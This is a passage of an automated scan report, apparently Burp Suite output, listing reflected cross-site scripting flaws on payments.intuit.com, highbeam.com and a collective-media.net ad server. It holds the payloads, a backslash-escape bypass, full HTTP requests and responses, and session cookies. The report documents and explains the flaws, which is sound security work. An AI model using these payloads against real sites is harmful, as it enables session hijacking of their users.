Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95F3B280A0805192AA117E302939460
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=quickbooks_002donline_002dbilling_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 127127

...[SNIP]...
<script>alert(1)</script>b4f50ac6cd0 | -->
...[SNIP]...

2.121. http://payments.intuit.com/products/quickbooks-payment-solutions/quickbooks-online-billing.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/quickbooks-payment-solutions/quickbooks-online-billing.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86458'-alert(1)-'2f8b7b8371f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:03:26 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=FA-3Ik5F2gUo8heU3wf98g**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:40:27 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95F06D70A0805192AA117E3351F6E5A
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=quickbooks_002donline_002dbilling_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 127094


...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=86458'-alert(1)-'2f8b7b8371f';
                   </script>
...[SNIP]...

2.122. http://payments.intuit.com/products/quickbooks-payment-solutions/web-credit-card-processing.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/quickbooks-payment-solutions/web-credit-card-processing.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ecbd'-alert(1)-'a54af6c28ec was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /products/quickbooks-payment-solutions/web-credit-card-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=6ecbd'-alert(1)-'a54af6c28ec

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:04:57 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=NiG1d4F8Z+SeG-SglGtlog**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:41:58 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D96069050A0805192AA117E328077B90
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=internet_002dmerchant_002daccounts_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 116386


...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=6ecbd'-alert(1)-'a54af6c28ec';
                   </script>
...[SNIP]...

2.123. http://payments.intuit.com/products/quickbooks-payment-solutions/web-credit-card-processing.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/quickbooks-payment-solutions/web-credit-card-processing.jsp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 38485--><script>alert(1)</script>074023fb5c0 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:05:13 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=deElcMZz9r2VrFsUqfo9UQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:42:14 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D960A9370A0805192AA117E3EA41B33F
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=internet_002dmerchant_002daccounts_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 116418

...[SNIP]...
<script>alert(1)</script>074023fb5c0 | -->
...[SNIP]...

2.124. http://payments.intuit.com/support/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/support/

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 8809e--><script>alert(1)</script>275e11ad70b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /support/ HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=8809e--><script>alert(1)</script>275e11ad70b

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:01:27 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=TDJVadNr8+ViGI-INyH2Zw**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:38:28 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95D33000A0805192AA117E3C409CD4F
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=index_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 98228

...[SNIP]...
<script>alert(1)</script>275e11ad70b | -->
...[SNIP]...

2.125. http://payments.intuit.com/support/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/support/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dceb5'-alert(1)-'94b519c31b1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:01:12 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=UGJvXvyLwdoaSfkAAlbu1A**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:38:13 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95CFABC0A0805192AA117E39292EB50
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=index_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 98195


...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=dceb5'-alert(1)-'94b519c31b1';
                   </script>
...[SNIP]...

2.126. http://payments.intuit.com/support/glossary.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/support/glossary.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef888'-alert(1)-'bf789d01126 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /support/glossary.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=ef888'-alert(1)-'bf789d01126

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:00:54 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=3dnIEVlZcZgtxMibVwZkxA**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:37:55 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95CB3660A0805192AA117E30609CB68
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=glossary_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 140104


...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=ef888'-alert(1)-'bf789d01126';
                   </script>
...[SNIP]...

2.127. http://payments.intuit.com/support/glossary.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/support/glossary.jsp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 93b01--><script>alert(1)</script>d9ed33811bf was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:01:05 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=g1QXXAHB2GhfRtmgIA-0mQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:38:06 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95CDE020A0805192AA117E34818FE92
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=glossary_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 140135

...[SNIP]...
<script>alert(1)</script>d9ed33811bf | -->
...[SNIP]...

2.128. http://www.highbeam.com/doc/1P2-675451.html [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.highbeam.com
Path:	/doc/1P2-675451.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 21569\'%3balert(1)//1039538ce7a was submitted in the Referer HTTP header. This input was echoed as 21569\\';alert(1)//1039538ce7a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /doc/1P2-675451.html HTTP/1.1
Host: www.highbeam.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: http://www.google.com/search?hl=en&q=21569\'%3balert(1)//1039538ce7a

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Mon, 21 Mar 2011 16:42:23 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=qzx3fq552fl4mxvclat4fj55; path=/; HttpOnly
Set-Cookie: FirstVisit=repeat; domain=highbeam.com; expires=Sat, 17-Sep-2011 16:43:23 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 21 Mar 2011 16:43:22 GMT
Vary: Accept-Encoding, User-Agent
Content-Length: 32058

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_HeadMain">
...[SNIP]...
<script language="javascript" type="text/javascript">
var tancc='sq=21569\\';alert(1)//1039538ce7a:news:general';
var tcdacmd='dt';
</script>
...[SNIP]...

2.129. http://k.collective-media.net/cmadj/cm.womensforum/ [cli cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://k.collective-media.net
Path:	/cmadj/cm.womensforum/

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c65a"%3balert(1)//ad037404951 was submitted in the cli cookie. This input was echoed as 1c65a";alert(1)//ad037404951 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /cmadj/cm.womensforum/;sz=300x250;net=cm;ord=[timestamp];ord1=541263;cmpgurl=http%253A//www.highbeam.com/iframead/display.aspx%253Fsite%253Dgale.hbr.doc%2526zone%253Dp5554%2526kvps%253Dpage%253Dwall%253Bcat%253Dhbr_99%253Bpub%253Dp5554%253Bpos%253Dr2%253Bchannel%253D1000000025%253Bsz%253D300x250%252C300x600%253Btile%253D2%253Bord%253D19528853%253B%2526id%253Dad-r2c6cce%252522%25253balert%25281%2529//c18ae8de3b0? HTTP/1.1
Host: k.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.highbeam.com/iframead/display.aspx?site=gale.hbr.doc&zone=p5554&kvps=page=wall;cat=hbr_99;pub=p5554;pos=r2;channel=1000000025;sz=300x250,300x600;tile=2;ord=19528853;&id=ad-r2c6cce%22%3balert(1)//c18ae8de3b0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11e4f07c0988ac71c65a"%3balert(1)//ad037404951; rdst11=1; rdst12=1; dp2=1; JY57=35YvzfrqY8QJ9XL2-I1ND8AO_jR1EdT1Qzx7gTonjUIP66jUwQOVTIg; nadp=1; dc=dc-dal-sea

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 21 Mar 2011 16:42:18 GMT
Connection: close
Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Tue, 22-Mar-2011 16:42:18 GMT
Set-Cookie: qcms=1; domain=collective-media.net; path=/; expires=Tue, 22-Mar-2011 16:42:18 GMT
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Tue, 22-Mar-2011 00:42:18 GMT
Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Tue, 22-Mar-2011 16:42:18 GMT
Content-Length: 8287

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
</scr'+'ipt>');CollectiveMedia.addPixel("http://ib.adnxs.com/mapuid?member=311&user=11e4f07c0988ac71c65a";alert(1)//ad037404951&seg_code=am.bk&ord=1300725738",true);CollectiveMedia.addPixel("http://pixel.quantserve.com/pixel/p-86ZJnSph3DaTI.gif",false);CollectiveMedia.addPixel("http://tags.bluekai.com/site/2731",false);Collect
...[SNIP]...

2.130. http://payments.intuit.com/ [abTestGroup cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/

Issue detail

